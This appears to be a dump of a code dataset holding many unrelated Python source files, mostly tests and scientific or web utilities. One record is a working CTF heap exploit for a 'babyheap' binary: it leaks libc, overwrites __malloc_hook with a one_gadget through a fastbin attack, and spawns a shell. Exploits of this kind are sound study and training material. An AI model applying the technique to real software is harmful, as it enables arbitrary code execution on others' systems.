id
stringlengths
3
8
content
stringlengths
100
981k
11569131
import pytest import os class TestChatAndStudent: chat_files_data_regular = [ "chat_file_valid_english_nba_7_students.txt", "chat_file_valid_hebrew_7_students.txt" ] @pytest.mark.parametrize("chat_file_name", chat_files_data_regular) def test_create_chat_df_validation_regular(self, folders, chat_df_func, chat_file_name): chat_df = chat_df_func(os.path.join(folders["chat_files_folder"], chat_file_name)) assert not chat_df.empty chat_files_data_empty = [ "chat_file_empty.txt", "chat_file_not_structured.txt", "chat_file_not_structured_partially.txt", ] @pytest.mark.parametrize("chat_file_name", chat_files_data_empty) def test_create_chat_df_validation_empty(self, folders, chat_df_func, chat_file_name): with pytest.raises(ValueError): assert chat_df_func(os.path.join(folders["chat_files_folder"], chat_file_name)) student_list_files_data = [ "example_csv_english_nba_8_students.csv", "example_excel_english_nba_7_students.xlsx", "example_excel_hebrew_7_students.xlsx", "example_excel_start_in_random_row.xlsx", "example_mashov_file_edited_and_saved_97.xls", "example_mashov_file_edited_and_saved_97_with_filled_data.xls", "דוגמה לרשימת תלמידים.xlsx", ] @pytest.mark.parametrize("excel_file_name", student_list_files_data) def test_create_students_df_validation(self, folders, create_no_parse_df_students_func, excel_file_name): df_students = create_no_parse_df_students_func(os.path.join(folders["student_list_files_folder"], excel_file_name)) assert not df_students.empty student_list_files_data_problems = [ "example_mashov_file_empty.xls", "example_excel_too_much_records.xlsx" ] @pytest.mark.parametrize("excel_file_name", student_list_files_data_problems) def test_create_students_df_validation_problem(self, folders, create_no_parse_df_students_func, excel_file_name): with pytest.raises(ValueError): assert create_no_parse_df_students_func(os.path.join(folders["student_list_files_folder"], excel_file_name))
11569161
from PwnContext import * if __name__ == '__main__': context.terminal = ['tmux', 'splitw', '-h'] # I always use tmux context.log_level = 'info' #-----function for quick script-----# s = lambda data :ctx.send(str(data)) #in case that data is a int sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) st = lambda delim,data :ctx.sendthen(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) sla = lambda delim,data :ctx.sendlinethen(str(delim), str(data)) r = lambda numb=4096 :ctx.recv(numb) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) leak = lambda address, count=0 :ctx.leak(address, count) def dbg(gdbscript='', *args, **kwargs): gdbscript = sym_ctx.gdbscript + gdbscript return ctx.debug(gdbscript, *args, **kwargs) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) @instruction_log() def alloc(size, content): sl(1) ru('size') sl(size) ru('content') s(content) @instruction_log() def show(ind): sl(2) ru('ind') sl(ind) @instruction_log() def delete(ind): sl(3) ru('ind') sl(ind) ctx.binary = change_ld('./babyheap', './ld.so') ctx.libc = './libc.so.6' ctx.io_sleep = 0.1 sym_ctx.symbols = {'lst':0x202020,} rs() dbg('c') alloc(0x28, '\n') #0 alloc(0xf0, '\n') #1 alloc(0x100, '\0'*0xf0+'\x00\x02\n') #2 alloc(0x100, '\n') #3 alloc(0x28, '\n') #4 delete(1) delete(2) delete(0) alloc(0x28, '\0'*0x28) #0 -> overflow alloc(0x80, '\n') #1 alloc(0x80, '\n') #2 delete(1) delete(3) alloc(0x80, '\n') #1 alloc(0x80, '\n') #3 delete(3) ctx.clean() show(2) ru('content: ') leak = uu64(ru('\n')) ctx.libc.address = leak-0x3c4b78 alloc(0x80, '\n')# 3 alloc(0x60, '\n')# 2 & 5 alloc(0x60, '\n')#6 delete(2) delete(6) delete(5) alloc(0x60, p64(ctx.libc.sym['__malloc_hook']-0x1b-8)+'\n') alloc(0x60, '\n') alloc(0x60, '\n') one = one_gadgets(ctx.libc, ctx.libc.address) alloc(0x60, '\0'*0x13+p64(one[0])+'\n') alloc(0x20,'\n') irt()
11569181
from graphql import GraphQLSchema, GraphQLResolveInfo import frappe def bind(schema: GraphQLSchema): schema.mutation_type.fields["deleteDoc"].resolve = delete_doc_resolver def delete_doc_resolver(obj, info: GraphQLResolveInfo, **kwargs): doctype = kwargs.get("doctype") name = kwargs.get("name") doc = frappe.get_doc(doctype, name) doc.delete() return frappe._dict({ "doctype": doctype, "name": name, "success": True })
11569227
from erde.io.gpkg import driver as dr from erde import read_df from time import sleep import errno import geopandas as gpd import os import pytest d = 'tests/io/data/' points_file = d + 'blocks-points.gpkg' match_points = d + 'match-points.gpkg' def silentremove(filename): filename, *rest = filename.split(':') try: os.remove(filename) except OSError as e: if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory # re-raise exception if a different error occurred raise def test_read(): for s in (True, False): reader = dr.read_stream(points_file, sync=s) for df in reader: assert isinstance(df, gpd.GeoDataFrame) def test_bad_file(): not_a_gpkg = '/tmp/not-a-gpkg.gpkg' for s in (True, False): with pytest.raises(FileNotFoundError): dr.read_stream('/tmp/not-a-gpkg-2.gpkg', sync=s) # empty file with open(not_a_gpkg, 'w') as f: f.write('') with pytest.raises(RuntimeError): dr.read_stream(not_a_gpkg, sync=s) def test_exception_in_read(): class TmpReader(dr.reader): def _read_sync(self): for i, df in enumerate(super()._read_sync()): if i == 2: sleep(1) raise RuntimeError('planned crash') yield df for s in (True, False): reader = TmpReader(points_file, sync=s, chunk_size=10) assert len(next(reader)) == 10 assert len(next(reader)) == 10 with pytest.raises(RuntimeError): next(reader) reader._handler.close() def test_geometry_filter(): for s in (True, False): filter_source = d + 'match-simple-polys.geojson' filter_df = read_df(filter_source) filter_geom = filter_df['geometry'].unary_union expected_names = set('ACDFGI') for test_filter in (filter_source, filter_df, filter_geom, None): stream = dr.read_stream(match_points, test_filter, chunk_size=100_000, sync=s) for df in stream: assert len(df) > 0 if test_filter is not None: # when None, the set is bigger than expected_names assert set(df['name'].tolist()).issubset(expected_names) sleep(1) tmp_points = '/tmp/temporary-points.gpkg' def test_write(): for s in (True, False): print(f'gpkg test write begin s={s}') old_df = read_df(match_points) if os.path.exists(tmp_points): os.unlink(tmp_points) assert not os.path.exists(tmp_points), f"could not delete file {tmp_points} before test" with dr.write_stream(tmp_points, sync=s) as w: for df in dr.read_stream(match_points, chunk_size=10): w(df) assert os.path.exists(tmp_points), f"file {tmp_points} does not exist, but should have been created" new_df = read_df(tmp_points) assert sorted(new_df['name'].tolist()) == sorted(old_df['name'].tolist()) print(f'gpkg test write end s={s}') def test_write_error(): for s in (False, True): print(f'gpkg test write error begin s={s}') try: os.unlink(tmp_points) except: pass with pytest.raises(RuntimeError): with dr.write_stream(tmp_points, sync=s) as w: rd = dr.read_stream(points_file, chunk_size=10, sync=s) for i, df in enumerate(rd): if i == 2: print('raising exception') raise RuntimeError('planned exception') print('writing') w(df) rd._handler.close() # file layer does not exist sleep(1) assert not os.path.exists(tmp_points) if not s: # if async, process must be ended assert not w.background_process.is_alive() sleep(1) print(f'gpkg test write error end s={s}') def test_write_empty(): import fiona for s, ss in {True: 'sync', False: 'async'}.items(): ds_name = f'empty-test-{ss}' ds_path = f'/tmp/{ds_name}.gpkg' silentremove(ds_path) with dr.write_stream(ds_path): pass assert os.path.exists(ds_path) layers = fiona.listlayers(ds_path) assert ds_name in layers def test_stream_guess_layer(): from erde import read_stream # must find the only layer for df in read_stream(d + 'layer-name-different.gpkg'): assert len(df) > 0 # must guess by filename for df in read_stream(d + 'guessable-layer.gpkg'): assert len(df) > 0 # if 2 layers and none like file name, raises exception with pytest.raises(RuntimeError): read_stream(d + 'unguessable-layer.gpkg') def test_read_stats(): from erde import read_stream rd = read_stream(d + 'stats.gpkg') print() print(rd.stats()) print(next(rd))
11569242
from inspect import getmembers, getmodule from typing import Set, Tuple, Type from .schemes import BaseScheme class TouchUp: _registry: Set[Tuple[Type, str]] = set() @classmethod def run(cls, app): for target, method_name in cls._registry: method = getattr(target, method_name) if app.test_mode: placeholder = f"_{method_name}" if hasattr(target, placeholder): method = getattr(target, placeholder) else: setattr(target, placeholder, method) module = getmodule(target) module_globals = dict(getmembers(module)) for scheme in BaseScheme._registry: modified = scheme(app)(method, module_globals) setattr(target, method_name, modified) target.__touched__ = True @classmethod def register(cls, target, method_name): cls._registry.add((target, method_name))
11569248
from abaqus import * from abaqusConstants import * import config from src.builders import MODEL_NAME, STEP_NAME from src.builders.base_builder import BaseBuilder class DynamicFieldOutputRequestBuilder(BaseBuilder): def __init__(self): super(DynamicFieldOutputRequestBuilder, self).__init__() self._required_arguments = [ MODEL_NAME, STEP_NAME ] def _build(self, **kwargs): output_name = 'Output_%s' % kwargs[MODEL_NAME] model_name = kwargs[MODEL_NAME] step_name = kwargs[STEP_NAME] mdb.models[model_name].FieldOutputRequest( name=output_name, createStepName=step_name, variables=( 'S', 'SVAVG', 'PE', 'PEVAVG', 'PEEQ', 'PEEQVAVG', 'LE', 'ER', 'U', 'V', 'A', 'RF', 'CSTRESS', 'NT', 'HFL', 'RFL', 'EVF'), numIntervals=config.NUM_INTERVALS )
11569249
class TimeZoneDBPlugin: def __init__(self, config): super(TimeZoneDBPlugin, self).__init__() self.config = config # pylint: disable=no-self-use def generate(self, result): datetime = result["datetime"] location = result["location"] return { "text": "It is {} in {}".format(datetime, location), "voice": "It is {} in {}".format(datetime, location) }
11569263
chart_options = dict( mode="vega-lite", renderer="svg", actions={"export": True, "source": True, "editor": True}, theme="light", tooltip={"theme": "light"}, )
11569274
import pytest from cluster_toolkit import sigma_reconstruction as SR from os.path import dirname, join import numpy as np import numpy.testing as npt
11569360
from __future__ import print_function, division, unicode_literals import os import operator import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import numpy as np from math import sqrt from scipy.spatial import Delaunay, ConvexHull from pymatgen.core.composition import Composition from pymatgen.core.structure import Structure from pymatgen.core.sites import PeriodicSite from pymatgen.core.periodic_table import Element from pymatgen.io.vasp.outputs import Vasprun from pymatgen.symmetry.analyzer import SpacegroupAnalyzer from mpinterfaces.utils import is_converged __author__ = "<NAME>" __copyright__ = "Copyright 2017, Henniggroup" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __status__ = "Production" __date__ = "March 3, 2017" def sq_dist(p1, p2): """ Calculate the non-square-root distance between two points. Args: p1, p2: 1x3 point coordinates. """ return (p1[0]-p2[0])**2+(p1[1]-p2[1])**2+(p1[2]-p2[2])**2 def pt_btwn(pt1, pt2, r): """ Get the vector of magnitude `r` along the path from pt1 to pt2. Args: pt1, pt2 (array): points defining the direction of the vector to return r (float): magnitude of vector to return Returns: 3D vector. """ total_vector = np.subtract(pt2, pt1) u = np.array(total_vector/np.linalg.norm(total_vector)) return np.add(pt1, r*u) def get_interstitial_sites(structure, octahedra=False, unique=False): """ Use a Delaunay triangulation of all atomic sites in the crystal structure to define tetrahedra of open volumes (interstitial sites). Each interstitial site is ranked according to the maximum radius of an atom that could fit in that site without overlapping one of the existing neighboring atoms' radii. The default behavior is to stop there, but by setting `octahedra` to True, the tetrahedra which share faces are combined to form bipyramids (hexahedra) and then points are added to these bipyramids to formoctahedra, in order to identify the largest 5- and 6-fold coordinated sites as well. This takes a little longer since it requires combining tetrahedra. Args: structure (Structure): Pymatgen Structure object octahedra (Boolean): Whether or not to search also for octahedral interstitial sites. unique (Boolean): Whether or not to enforce that only symmetrically inequivalent sites are returned. Determining the symmetry-equivalence is usually by far the slowest task in the algorithm. Returns: interstitials (dict): dictionary of the form {"tetrahedral": [(coordinates, max_radius), ...], "hexahedral": [(coordinates, max_radius), ...], "octahedral": [(coordinates, max_radius), ...]} storing lists of each interstitial site for both coordination types, sorted by largest radius first. Coordinates are given as cartesian. """ # Preserve the original structure st = structure.copy() # Small unit cells make the triangulation unreliable n_sites = structure.num_sites if n_sites < 4: st.make_supercell(3) m_0 = st.lattice._matrix # Make a 3x3x3 supercell so that the center unit cell # is surrounded by its images- i.e. it has no "boundaries", # which can erroneously create tetrahedra of infinite volumes. st.make_supercell(3) m = st.lattice._matrix # These are the vertices of only the center cell cell_vertices = np.array([ np.add(np.add(m[0]/3., m[1]/3.), m[2]/3.), np.add(np.add(m[0]/1.5, m[1]/3.), m[2]/3.), np.add(np.add(m[0]/3., m[1]/1.5), m[2]/3.), np.add(np.add(m[0]/1.5, m[1]/1.5), m[2]/3.), np.add(np.add(m[0]/3., m[1]/3.), m[2]/1.5), np.add(np.add(m[0]/1.5, m[1]/3.), m[2]/1.5), np.add(np.add(m[0]/3., m[1]/1.5), m[2]/1.5), np.add(np.add(m[0]/1.5, m[1]/1.5), m[2]/1.5) ]) cell_center = np.mean(cell_vertices, axis=0) other_cell_centers = [] for i in range(-1, 2): for j in range(-1, 2): for k in range(-1, 2): c = np.add(cell_center, np.multiply(i, m_0[0])) c = np.add(c, np.multiply(j, m_0[1])) c = np.add(c, np.multiply(k, m_0[2])) other_cell_centers.append(c) max_distance_in_cell = sq_dist(cell_vertices[0], cell_center) points = [s.coords for s in st.sites] radii = [float(s.specie.atomic_radius) for s in st.sites] # Create the initial Delaunay triangulation of all sites in the # supercell. delaunay = Delaunay(points) all_simplices = delaunay.simplices.copy() # Now filter those Delaunay simplices to only those with # at least one vertex lying within the center unit cell. simplices = [] center_cell = ConvexHull(cell_vertices) if not octahedra: for simplex in all_simplices: for vertex in simplex: if sq_dist(cell_center, points[vertex]) <= max_distance_in_cell\ and sq_dist(cell_center, points[vertex]) ==\ min([sq_dist(points[vertex], pt) for pt in other_cell_centers]): simplices.append(simplex) break else: for simplex in all_simplices: n = 0 for vertex in simplex: if sq_dist(cell_center, points[vertex]) <= max_distance_in_cell\ and sq_dist(cell_center, points[vertex]) ==\ min([sq_dist(points[vertex], pt) for pt in other_cell_centers]): n += 1 if n == 4: simplices.append(simplex) # Calculate the maximum interstitial # radius for all the relevant tetrahedra. tetrahedra = [] for simplex in simplices: a = points[simplex[0]] r_a = radii[simplex[0]] b = points[simplex[1]] r_b = radii[simplex[1]] c = points[simplex[2]] r_c = radii[simplex[2]] d = points[simplex[3]] r_d = radii[simplex[3]] centroid = np.mean([a,b,c,d], axis=0) # Add the atomic radii to the nuclei loactions to find # their "true" extrema, then use these to find the # "true" centroid. move = 1 while move > 0.01: true_a = pt_btwn(a, centroid, r_a) true_b = pt_btwn(b, centroid, r_b) true_c = pt_btwn(c, centroid, r_c) true_d = pt_btwn(d, centroid, r_d) true_centroid = np.mean( [true_a,true_b,true_c,true_d], axis=0 ) move = sq_dist(true_centroid, centroid) centroid = true_centroid max_radius = sqrt(min( [sq_dist(true_centroid, pt) for pt in [true_a,true_b,true_c,true_d]] )) tetrahedra.append( (true_centroid, [tuple(x) for x in [a, b, c, d]], [r_a, r_b, r_c, r_d], 4, max_radius) ) interstitials = {"tetrahedral": []} if octahedra: tet_pts = [i[1] for i in tetrahedra] tet_pts = list(set([coords for pt in tet_pts for coords in pt])) interstitials.update({"hexahedral": [], "octahedral": []}) for i in range(len(tetrahedra)): for j in range(i, len(tetrahedra)): # If 3 vertices are shared then the tetrahedra # share a face and form a bipyramid. shared = list(set(tetrahedra[i][1]) & set(tetrahedra[j][1])) if len(shared) == 3: # Vertices of the bipyramid a = tetrahedra[i][1][0] r_a = tetrahedra[i][2][0] b = tetrahedra[i][1][1] r_b = tetrahedra[i][2][1] c = tetrahedra[i][1][2] r_c = tetrahedra[i][2][2] d = tetrahedra[i][1][3] r_d = tetrahedra[i][2][3] # Fifth point to define trigonal bipyramid e, r_e = [ (s, tetrahedra[j][2][k]) for k, s in enumerate(tetrahedra[j][1]) if s not in tetrahedra[i][1] ][0] h_centroid = np.mean([a, b, c, d, e], axis=0) move = 1 while move > 0.01: true_a = pt_btwn(a, h_centroid, r_a) true_b = pt_btwn(b, h_centroid, r_b) true_c = pt_btwn(c, h_centroid, r_c) true_d = pt_btwn(d, h_centroid, r_d) true_e = pt_btwn(e, h_centroid, r_e) true_h_centroid = np.mean( [true_a,true_b,true_c,true_d,true_e], axis=0 ) move = sq_dist(true_h_centroid, h_centroid) h_centroid = true_h_centroid r_h = sqrt(min( [sq_dist(true_h_centroid, pt) for pt in [true_a, true_b, true_c, true_d, true_e]] )) # Add the bipyramid to the final list # of interstitials. interstitials["hexahedral"].append( (tuple(h_centroid), r_h) ) # Enlarge the bipyramid by one point to create # octahedra. v1 = np.subtract(shared[0], shared[1]) v2 = np.subtract(shared[0], shared[2]) tol = max([sq_dist(shared[0], shared[1]), sq_dist(shared[0], shared[2]), sq_dist(shared[1], shared[2])]) * 1.1 for index, f in enumerate(tet_pts): v3 = np.subtract(shared[0], f) distances = [sq_dist(f, p) for p in shared] distances.sort() if 0 < distances[0] < tol and 0 < distances[1] < tol\ and np.dot(v3, (np.cross(v1, v2))) == 0: r_f = radii[index] o_centroid = np.mean([a, b, c, d, e, f], axis=0) move = 1 while move > 0.01: true_a = pt_btwn(a, o_centroid, r_a) true_b = pt_btwn(b, o_centroid, r_b) true_c = pt_btwn(c, o_centroid, r_c) true_d = pt_btwn(d, o_centroid, r_d) true_e = pt_btwn(e, o_centroid, r_e) true_f = pt_btwn(f, o_centroid, r_f) true_o_centroid = np.mean( [true_a,true_b,true_c,true_d,true_e,true_f], axis=0 ) move = sq_dist(true_o_centroid, o_centroid) o_centroid = true_o_centroid r_o = sqrt(min( [sq_dist(true_o_centroid, pt) for pt in [true_a,true_b,true_c,true_d,true_e, true_f]] )) # Add the octahedron to the final # list of interstitials. interstitials["octahedral"].append( (tuple(o_centroid), r_o) ) interstitials["hexahedral"] = list(set(interstitials["hexahedral"])) interstitials["octahedral"] = list(set(interstitials["octahedral"])) interstitials["tetrahedral"] = [(i[0], i[4]) for i in tetrahedra] # Since the centroid coordinates were given in the center # cell of the supercell, bring them back into the original # unit cell. if n_sites < 4: f = 1./3. else: f = 1. for c in interstitials: for i in range(len(interstitials[c])): for r in m_0: interstitials[c][i] = ( np.multiply( np.subtract(np.array(interstitials[c][i][0]), r), f ), interstitials[c][i][1] ) # Sort by the maximum radii for c in interstitials: interstitials[c].sort(key=operator.itemgetter(1)) interstitials[c].reverse() if unique: sga = SpacegroupAnalyzer(structure) sop = sga.get_space_group_operations() l = structure.lattice for c in interstitials: remove = [] for i in range(len(interstitials[c])): if i not in remove: site_i = PeriodicSite("C", interstitials[c][i][0], l) for j in range(i+1, len(interstitials[c])): if interstitials[c][i][1] == interstitials[c][j][1] and\ sop.are_symmetrically_equivalent( [site_i], [PeriodicSite("C",interstitials[c][j][0],l)] ): remove.append(j) interstitials[c] = [interstitials[c][x] for x in range(len(interstitials[c])) if x not in remove] return interstitials def get_coordination_polyhedra(structure, cation, anion="O"): r_c, r_a = Element(cation).atomic_radius, Element(anion).atomic_radius st = structure.copy() cations = [s for s in st.sites if s.specie.symbol == cation] uc_tetrahedra, uc_octahedra = [], [] for s in cations: anion_shell = [a[0] for a in st.get_neighbors(s, (r_c+r_a)*1.1)] if len(anion_shell) == 4: uc_tetrahedra.append( [tuple([round(c, 3) for c in a.coords]) for a in anion_shell]) elif len(anion_shell) == 6: uc_octahedra.append( [tuple([round(c, 3) for c in a.coords]) for a in anion_shell]) st.make_supercell(2) cations = [s for s in st.sites if s.specie.symbol == cation] tetrahedra, octahedra = [], [] for s in cations: anion_shell = [a[0] for a in st.get_neighbors(s, (r_c+r_a)*1.1)] if len(anion_shell) == 4: tetrahedra.append( [tuple([round(c, 3) for c in a.coords]) for a in anion_shell]) elif len(anion_shell) == 6: octahedra.append( [tuple([round(c, 3) for c in a.coords]) for a in anion_shell]) t_corner, t_edge, t_face = [], [], [] o_corner, o_edge, o_face = [], [], [] if len(tetrahedra) != 0: for i in range(len(tetrahedra)): t1 = tetrahedra[i] for j in range(i+1, len(tetrahedra)): t2 = tetrahedra[j] shared = list(set(t1) & set(t2)) if len(shared) == 1: # Corner sharing if t1 in uc_tetrahedra and t1 not in t_corner: t_corner.append(t1) if t2 in uc_tetrahedra and t2 not in t_corner: t_corner.append(t2) elif len(shared) == 2: # Edge sharing if t1 in uc_tetrahedra and t1 not in t_edge: t_edge.append(t1) if t2 in uc_tetrahedra and t2 not in t_edge: t_edge.append(t2) elif len(shared) == 3: # Face sharing if t1 in uc_tetrahedra and t1 not in t_face: t_face.append(t1) if t2 in uc_tetrahedra and t2 not in t_face: t_face.append(t2) if len(octahedra) != 0: for i in range(len(octahedra)): o1 = octahedra[i] for j in range(i+1, len(octahedra)): o2 = octahedra[j] shared = list(set(o1) & set(o2)) if len(shared) == 1: # Corner sharing if o1 in uc_octahedra and o1 not in o_corner: o_corner.append(o1) if o2 in uc_octahedra and o2 not in o_corner: o_corner.append(o2) elif len(shared) == 2: # Edge sharing if o1 in uc_octahedra and o1 not in o_edge: o_edge.append(o1) if o2 in uc_octahedra and o2 not in o_edge: o_edge.append(o2) elif len(shared) == 3: # Face sharing if o1 in uc_octahedra and o1 not in o_face: o_face.append(o1) if o2 in uc_octahedra and o2 not in o_face: o_face.append(o2) polyhedra = { "tetrahedra": {"corner": t_edge, "edge": t_corner, "face": t_face}, "octahedra": {"corner": o_edge, "edge": o_corner, "face": o_face} } return polyhedra def plot_ion_hull_and_voltages(ion, charge=None, fmt='pdf'): """ Plots the phase diagram between the pure material and pure ion, Connecting the points on the convex hull of the phase diagram. Args: ion (str): name of atom that was intercalated, e.g. 'Li'. charge (float): charge donated by each ion. fmt (str): matplotlib format style. Check the matplotlib docs for options. Returns: capacity (float): Maximum capacity """ # Calculated with the relax() function in # mat2d.stability.startup. If you are using other input # parameters, you need to recalculate these values! ion_ev_fu = {'Li': -1.838, 'Mg': 0.620, 'Al': -3.291} if charge is None: charge = Element(ion).common_oxidation_states[0] energy = Vasprun('vasprun.xml').final_energy composition = Structure.from_file('POSCAR').composition # Get the formula (with single-digit integers preceded by a '_'). twod_material = list(composition.reduced_formula) twod_formula = str() for i in range(len(twod_material)): try: int(twod_material[i]) twod_formula += '_{}'.format(twod_material[i]) except: twod_formula += twod_material[i] twod_ev_fu = energy / composition.get_reduced_composition_and_factor()[1] data = [(0, 0, 0, twod_ev_fu)] # (at% ion, n_ions, E_F, abs_energy) dirs = [dir for dir in os.listdir(os.getcwd()) if os.path.isdir(dir)] for directory in dirs: if is_converged(directory): os.chdir(directory) energy = Vasprun('vasprun.xml').final_energy composition = Structure.from_file('POSCAR').composition ion_fraction = composition.get_atomic_fraction(ion) no_ion_comp_dict = composition.as_dict() no_ion_comp_dict.update({ion: 0}) no_ion_comp = Composition.from_dict(no_ion_comp_dict) n_twod_fu = no_ion_comp.get_reduced_composition_and_factor()[1] n_ions = composition[ion] / n_twod_fu E_F = ((energy - composition[ion] * ion_ev_fu[ion] - twod_ev_fu * n_twod_fu)/ composition.num_atoms) data.append((ion_fraction, n_ions, E_F, energy / n_twod_fu)) os.chdir('../') data.append((1, 1, 0, ion_ev_fu[ion])) # Pure ion sorted_data = sorted(data, key=operator.itemgetter(0)) # Determine which compositions are on the convex hull. energy_profile = np.array([[item[0], item[2]] for item in sorted_data if item[2] <= 0]) hull = ConvexHull(energy_profile) convex_ion_fractions = [energy_profile[vertex, 0] for vertex in hull.vertices] convex_formation_energies = [energy_profile[vertex, 1] for vertex in hull.vertices] convex_ion_fractions.append(convex_ion_fractions.pop(0)) convex_formation_energies.append(convex_formation_energies.pop(0)) concave_ion_fractions = [pt[0] for pt in sorted_data if pt[0] not in convex_ion_fractions] concave_formation_energies = [pt[2] for pt in sorted_data if pt[0] not in convex_ion_fractions] for item in data: if item[0] == sorted(convex_ion_fractions)[-2]: max_ions = item[1] molar_mass = Composition(no_ion_comp.reduced_formula).weight faraday = 26801 # In mAh/mol capacity = (max_ions * charge * faraday) / molar_mass # In mAh/g voltage_profile = [] j = 0 k = 0 for i in range(1, len(sorted_data) - 1): if sorted_data[i][0] in convex_ion_fractions: voltage = -(((sorted_data[i][3] - sorted_data[k][3])- (sorted_data[i][1] - sorted_data[k][1]) * ion_ev_fu[ion]) / (sorted_data[i][1] - sorted_data[k][1])) voltage_profile.append((sorted_data[k][0], voltage)) voltage_profile.append((sorted_data[i][0], voltage)) j += 1 k = i voltage_profile.append((voltage_profile[-1][0], 0)) voltage_profile.append((1, 0)) voltage_profile_x = [tup[0] for tup in voltage_profile] voltage_profile_y = [tup[1] for tup in voltage_profile] ax = plt.figure(figsize=(14, 10)).gca() ax.plot([0, 1], [0, 0], 'k--') ax.plot(convex_ion_fractions, convex_formation_energies, 'b-', marker='o', markersize=12, markeredgecolor='none') ax.plot(concave_ion_fractions, concave_formation_energies, 'r', marker='o', linewidth=0, markersize=12, markeredgecolor='none') ax2 = ax.twinx() ax2.plot(voltage_profile_x, voltage_profile_y, 'k-', marker='o') ax.text(0, 0.002, r'$\mathrm{%s}$' % twod_formula, family='serif', size=24) ax.text(0.99, 0.002, r'$\mathrm{%s}$' % ion, family='serif', size=24, horizontalalignment='right') ax.set_xticklabels(ax.get_xticks(), family='serif', size=20) ax.set_yticklabels(ax.get_yticks(), family='serif', size=20) ax2.set_yticklabels(ax2.get_yticks(), family='serif', size=20) ax.set_xlabel('at% {}'.format(ion), family='serif', size=28) ax.set_ylabel(r'$\mathrm{E_F\/(eV/atom)}$', size=28) ax2.yaxis.set_label_position('right') if ion == 'Li': ax2.set_ylabel(r'$\mathrm{Potential\/vs.\/Li/Li^+\/(V)}$', size=28) elif ion == 'Mg': ax2.set_ylabel(r'$\mathrm{Potential\/vs.\/Mg/Mg^{2+}\/(V)}$', size=28) elif ion == 'Al': ax2.set_ylabel(r'$\mathrm{Potential\/vs.\/Al/Al^{3+}\/(V)}$', size=28) plt.savefig('{}_hull.{}'.format(ion, fmt), transparent=True) return capacity # In mAh/g
11569370
from build.management.commands.export_publications import Command as ExportPublications class Command(ExportPublications): pass
11569375
from django import forms class ShellForm(forms.Form): code = forms.CharField( required=False, widget=forms.Textarea(attrs={'class': 'codearea'}), ) error_css_class = 'error'
11569379
from citrination_client.data import DatasetVersion def test_can_crud_number(): """ Tests that full get/set/delete functionality is available for the number property """ d = DatasetVersion(1) number = 2 assert d.number is 1 d.number = number assert d.number is number del(d.number) assert d.number is None
11569380
from .convert import config_to_classifier, classifier_to_pipeline, obtain_classifier, runhistory_to_trajectory, setups_to_configspace, modeltype_to_classifier, scale_configspace_to_log from .connect import task_counts, obtain_runhistory_and_configspace, cache_runhistory_configspace from .filesystem import obtain_marginal_contributions from .dictutils import rank_dict, sum_dict_values, divide_dict_values from .misc import get_time, fixed_parameters_to_suffix, do_run, name_mapping from .plot import to_csv_file, to_csv_unpivot, obtain_performance_curves, plot_task, boxplot_traces, average_rank from .priors import obtain_priors, get_kde_paramgrid, rv_discrete_wrapper
11569392
from typing import Dict from flask import request from flask_accepts import accepts, responds from flask_restx import Namespace, Resource from werkzeug.exceptions import BadRequest, Unauthorized from werkzeug.security import check_password_hash from .models import Token from .schema import TokenSchema, UserSchema from .service import create_user, find_user_by_email, generate_token api = Namespace("Auth", description="Getting a token") @api.route("/get_token") class AuthTokenResource(Resource): """Auth""" @accepts(schema=UserSchema, api=api) @responds(schema=TokenSchema) @api.doc(responses={401: 'check login data'}) def post(self) -> Token: """Get token by user login data""" obtained = request.parsed_obj email = obtained['email'] password = obtained['password'] user = find_user_by_email(email) if not user or not check_password_hash(user.password, password): raise Unauthorized("check login data") token = generate_token(user.id) print(token) return Token(token_value=token) @api.route("/signup") class RegisterResource(Resource): """Registration""" @accepts(schema=UserSchema, api=api) @api.doc(responses={200: 'registration successful'}) @api.doc(responses={400: 'user already exists'}) def post(self) -> Dict[str, str]: """User registration""" obtained = request.parsed_obj email = obtained['email'] password = obtained['password'] user = find_user_by_email(email) if not user: create_user(email, password=password) else: raise BadRequest("user already exists") return {"message": "registration successful"}
11569403
import os import sys import copy import logging from checker import * from .utils import create_section_name from .ofp import OfpBase from .utils import get_attrs_without_len # YAML: # - min_rate: # rate: 0 SCE_PROPERTIES = "properties" class OfpQueuePropCreator(OfpBase): @classmethod def create(cls, test_case_obj, dp, ofproto, ofp_parser, params): # create section name: OFPQueueProp... p_classes = {} for p in ofp_parser.OFPQueueProp._QUEUE_PROP_PROPERTIES.values(): key = create_section_name(p.__name__, "OFPQueueProp") p_classes[key] = p # create properties. properties = [] for p in params: for p_type, p_val in p.items(): p_obj = p_classes[p_type](**p_val) p_obj._set_targets(get_attrs_without_len(p_obj)) properties.append(p_obj) return properties
11569444
def minion_game(string): con, vow, l = "bcdfghjklmnpqrstvwxyz", "euioa", len(string) p1, p2 = {"name": "Stuart", "score": 0}, {"name": "Kevin", "score": 0} for i, char in enumerate(string.lower()): if char in con: p1["score"] += l - i elif char in vow: p2["score"] += l-i if p1["score"] == p2["score"]: print("Draw") else: winner = p1 if p1["score"] > p2["score"] else p2 print("{} {}".format(winner["name"], winner["score"]))
11569455
